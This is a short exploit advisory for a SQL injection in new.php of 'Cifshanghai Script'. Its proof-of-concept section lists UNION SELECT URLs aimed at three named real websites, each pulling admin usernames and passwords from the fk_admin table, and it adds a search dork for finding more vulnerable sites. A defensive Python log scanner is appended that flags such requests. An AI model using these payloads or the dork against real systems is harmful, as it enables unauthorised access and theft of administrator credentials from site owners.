[o] Cifshanghai Script SQL Injection Vulnerability
Software : Cifshanghai Script
Vendor : http://www.cifshanghai.com/
Author : NoGe
[o] Vulnerable file
new.php
[o] Exploit
http://localhost/[path]/new.php?id=[SQL]
[o] Proof Of Concept
http://www.feidamotohelmet.com/new.php?id=-26%20union%20select%201,2,3,4,group_concat(name,0x3a,password)%20from%20fk_admin--
http://www.vennas.com/new.php?id=-1%20union%20select%201,2,3,4,group_concat(name,0x3a,password)%20from%20fk_admin--
http://www.nicefurniture.com.cn/new.php?id=-20%20union%20select%201,2,3,4,5,6,group_concat(name,0x3a,password),8%20from%20fk_admin--
[o] Dork
"Powered by cifshanghai"
[o] Note
This is a private script.
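
A defender-side check for the request pattern shown in the proof of concept, as an added example that is not part of the original advisory: it scans web access logs for requests to new.php whose id parameter is not a plain integer. The log lines and client addresses are constructed, and it assumes that legitimate id values are purely numeric and that the server writes common/combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (addresses, paths and timestamps are made up).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /new.php?id=26 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /new.php?id=-26%20union%20select%201,2,3,4,group_concat(name,0x3a,password)%20from%20fk_admin-- HTTP/1.1" 200 5342
198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /shop/new.php?id=-1+UNION/**/SELECT+1,2,3,4,5-- HTTP/1.1" 200 4100
203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /news.php?id=abc HTTP/1.1" 404 210
203.0.113.4 - - [01/Jan/2024:10:01:02 +0000] "GET /new.php?page=2 HTTP/1.1" 200 5000
"""

# client address, request target and status from a common/combined log line
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# SQL keywords that appear in the advisory's UNION-based requests
SQL_TOKENS = re.compile(r"\b(union|select|from|group_concat)\b", re.I)


def classify_id(value):
    """Return None for a plain numeric id, otherwise a short reason string."""
    if re.fullmatch(r"\d+", value):
        return None
    tokens = sorted({t.lower() for t in SQL_TOKENS.findall(value)})
    if tokens:
        return "sql-keywords:" + ",".join(tokens)
    return "non-numeric"


def scan(log_text, script="new.php", param="id"):
    """Return (client, status, reason, decoded value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        # Match the script in any directory, but not look-alikes such as news.php.
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes the value and turns '+' into a space.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify_id(value)
            if reason:
                findings.append((client, status, reason, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request only shows that the page rendered; whether data was returned has to be confirmed from the response body or database logs.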